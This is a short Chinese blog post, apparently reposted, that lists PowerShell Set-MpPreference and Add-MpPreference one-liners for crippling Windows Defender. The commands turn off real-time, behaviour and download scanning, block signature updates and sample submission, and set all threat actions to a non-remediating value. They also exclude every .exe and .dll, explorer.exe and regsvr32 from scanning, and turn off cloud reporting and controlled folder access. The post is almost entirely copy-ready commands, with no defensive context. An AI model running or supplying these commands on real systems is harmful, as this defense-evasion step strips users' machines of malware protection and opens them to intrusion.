devbox
2023面试高手
这个屌丝很懒,什么也没留下!
关注作者
热门标签
热门文章
当前位置:   article > 正文

关闭defender_add-mppreference -exclusionpath

作者:2023面试高手 | 2024-02-27 12:16:10

add-mppreference -exclusionpath

Windows Defender功能削弱

# 关闭实时保护

  1. powershell.exe -command "Set-MpPreference -DisableRealtimeMonitoring $true"
  2.  
  3. # 关闭行为监视
  4. powershell.exe -command "Set-MpPreference -DisableBehaviorMonitoring $true"
  5.  
  6. # 禁用IOAV保护,禁止扫描下载的文件和附件
  7. powershell.exe -command "Set-MpPreference -DisableIOAVProtection $true"
  8.  
  9. # 关闭Defender自动更新
  10. powershell.exe -command "Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true"
  11.  
  12. # 禁止扫描.zip等的存档文件
  13. powershell.exe -command "Set-MpPreference -DisableArchiveScanning $true"
  14.  
  15. # 关闭已知漏洞利用防护
  16. powershell.exe -command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

Defender威胁忽视

  1. # 禁止提交样本
  2. powershell.exe -command "Set-MpPreference -SubmitSamplesConsent 2"
  3.  
  4. # 指定用于高级威胁的自动修复操作选项
  5. powershell.exe -command "Set-MpPreference -HighThreatDefaultAction 6 -Force"
  6.  
  7. # 指定用于中级威胁的自动修复操作选项
  8. powershell.exe -command "Set-MpPreference -ModerateThreatDefaultAction 6"
  9.  
  10. # 指定用于低级威胁的自动修复操作选项
  11. powershell.exe -command "Set-MpPreference -LowThreatDefaultAction 6"
  12.  
  13. # 指定用于严重威胁的自动修复操作选项
  14. powershell.exe -command "Set-MpPreference -SevereThreatDefaultAction 6"

Defender检测扩展排除

powershell.exe -command "Add-MpPreference -ExclusionExtension ".exe""

Defender检测进程排除

  1. powershell.exe -command "Add-MpPreference -ExclusionProcess "regsvr32""
  2.  
  3. powershell.exe -command "Add-MpPreference -ExclusionProcess "regsvr32*""
  4.  
  5. powershell.exe -command "Add-MpPreference -ExclusionProcess ".exe""
  6.  
  7. powershell.exe -command "Add-MpPreference -ExclusionProcess "iexplorer.exe""
  8.  
  9. powershell.exe -command "Add-MpPreference -ExclusionProcess "explorer.exe""
  10.  
  11. powershell.exe -command "Add-MpPreference -ExclusionProcess ".dll""
  12.  
  13. powershell.exe -command "Add-MpPreference -ExclusionProcess "*.dll""
  14.  
  15. powershell.exe -command "Add-MpPreference -ExclusionProcess "*.exe""

禁止向微软报告安全信息

cmd /c powershell.exe -command "Set-MpPreference -MAPSReporting 0"

保护关闭

  1. # PUA保护关闭
  2. powershell.exe -command "Set-MpPreference -PUAProtection disable"

攻击面减少

  1. # 关闭受控文件夹访问
  2. powershell.exe -command "Set-MpPreference -EnableControlledFolderAccess Disabled"

参考资料:

攻击技术研判|针对Windows Defender的防御削弱及LOLBAS规避技术分析 (qq.com)

声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/2023面试高手/article/detail/152870
推荐阅读
相关标签

Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。

  

闽ICP备14008679号